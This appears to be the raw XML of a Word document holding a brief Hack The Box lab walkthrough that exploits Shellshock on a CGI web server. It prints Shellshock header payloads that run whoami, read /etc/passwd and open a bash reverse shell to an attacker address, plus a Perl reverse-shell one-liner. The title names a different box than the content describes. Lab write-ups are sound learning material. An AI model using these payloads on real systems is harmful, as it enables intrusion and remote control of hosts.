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5B56" w14:textId="7C979A57" w:rsidR="00C73927" w:rsidRDefault="00465AFD">
      <w:r>
        <w:t>Lame HTB Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F090433" w14:textId="2E7A2FC6" w:rsidR="00465AFD" w:rsidRDefault="00465AFD">
      <w:r>
        <w:t xml:space="preserve">Please go through the all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan file which I have uploaded in the shocker folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20879CD1" w14:textId="675416FE" w:rsidR="00465AFD" w:rsidRDefault="00A4168C">
      <w:r>
        <w:t xml:space="preserve">Since the port 80 is open I ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool to list the directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002FCCC" w14:textId="75186D86" w:rsidR="00A4168C" w:rsidRDefault="00A4168C">
      <w:r>
        <w:t xml:space="preserve">I haven’t found any valid data on the directories, so I have user extensions </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, jpg, php, txt etc.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452EA9E9" w14:textId="77777777" w:rsidR="00A4168C" w:rsidRDefault="00A4168C"/>
    <w:p w14:paraId="428AA185" w14:textId="046DA18F" w:rsidR="00A4168C" w:rsidRDefault="00A20141">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CDBA7CA" wp14:editId="79255CBB">
            <wp:extent cx="4578773" cy="2999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568" cy="30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1745" w14:textId="44226CF6" w:rsidR="00465AFD" w:rsidRDefault="00465AFD"/>
    <w:p w14:paraId="77BAEA5D" w14:textId="0D184548" w:rsidR="00465AFD" w:rsidRDefault="00465AFD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF4E3DA" wp14:editId="018F96C4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A34F" w14:textId="1992751E" w:rsidR="00A4168C" w:rsidRDefault="00A4168C">
      <w:r>
        <w:t>I can see that the time is varying for every time you trigger the request, I came to know that the shellshock is used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEAC0DA" w14:textId="5FB6B059" w:rsidR="00A4168C" w:rsidRDefault="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E982410" wp14:editId="3CC6A322">
            <wp:extent cx="4057227" cy="110488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973" cy="11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579" w14:textId="39FEE126" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r>
        <w:t>have googled for shell shock vulnerabilities and exploits I have used the sample payloads to get execute the remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02104580" w14:textId="7DE3732B" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Below are the one-liners I have used in the project to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6306F" w14:textId="501B504C" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4168C">
        <w:t>custom:() { ignored; }; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (screenshot 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F919B" w14:textId="27960EC9" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4168C">
        <w:t>custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (screenshot 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1ED84" w14:textId="094348AF" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4168C">
        <w:t>custom:() { ignored;};/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4168C">
        <w:t>/10.10.14.4/1234 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (screenshot 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC9ACC8" w14:textId="7021C70A" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEE91D0" wp14:editId="140DCA97">
            <wp:extent cx="3359573" cy="173040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842" cy="17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FB6" w14:textId="77777777" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C"/>
    <w:p w14:paraId="34AD2830" w14:textId="77777777" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C"/>
    <w:p w14:paraId="1571ECF3" w14:textId="059EC60A" w:rsidR="00465AFD" w:rsidRDefault="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3751597C" wp14:editId="50208579">
            <wp:extent cx="3772747" cy="2048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274" cy="20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15EB" w14:textId="7F84C372" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA51E35" w14:textId="6CDCA585" w:rsidR="00A4168C" w:rsidRDefault="00A4168C" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EAC9FD" wp14:editId="49AA5BF1">
            <wp:extent cx="4477173" cy="3204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751" cy="32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C152" w14:textId="2DF6DE4A" w:rsidR="00F70E58" w:rsidRDefault="00F70E58" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781771FF" wp14:editId="76657999">
            <wp:extent cx="2370667" cy="28381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261" cy="28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9286" w14:textId="29635BBC" w:rsidR="00F70E58" w:rsidRDefault="00A20141" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F425DF4" wp14:editId="3E1A3AFF">
            <wp:extent cx="5731510" cy="1362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10E" w14:textId="548DAEF6" w:rsidR="00A20141" w:rsidRDefault="00377081" w:rsidP="00A4168C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00377081">
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00377081">
        <w:t xml:space="preserve"> -e 'use Socket;$i="10.10.14.4";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00377081">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00377081">
        <w:t>");};'</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6B8A2462" w14:textId="2DA2C35B" w:rsidR="00A20141" w:rsidRDefault="00A20141" w:rsidP="00A4168C"/>
    <w:p w14:paraId="582D485C" w14:textId="0F562A92" w:rsidR="00A20141" w:rsidRDefault="00A20141" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A372806" wp14:editId="7F719255">
            <wp:extent cx="5731510" cy="598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606" w14:textId="33C21BBD" w:rsidR="00A20141" w:rsidRDefault="00A20141" w:rsidP="00A4168C"/>
    <w:p w14:paraId="38AEE70B" w14:textId="028C1355" w:rsidR="00A20141" w:rsidRDefault="00A20141" w:rsidP="00A4168C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CE64D7" wp14:editId="4857A7D8">
            <wp:extent cx="5731510" cy="4486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4546C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D88F2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FD"/>
    <w:rsid w:val="00377081"/>
    <w:rsid w:val="00465AFD"/>
    <w:rsid w:val="00A20141"/>
    <w:rsid w:val="00A4168C"/>
    <w:rsid w:val="00C73927"/>
    <w:rsid w:val="00F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AE83"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D81CCF4-6857-4BBD-92A5-B6063181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e7527a318b83fc00c50545f1da72248c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645d5f95b771284d7effe58b8a07756a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C83B1-986F-46C1-AA9A-B2F6CE2B4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BF1F9-55C7-4481-98F8-EF41FB3D3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0C1BD-6857-4854-977F-845D56D9568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Munimadugu Somasekhar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Munimadugu Somasekhar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-25T13:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-25T13:48:00Z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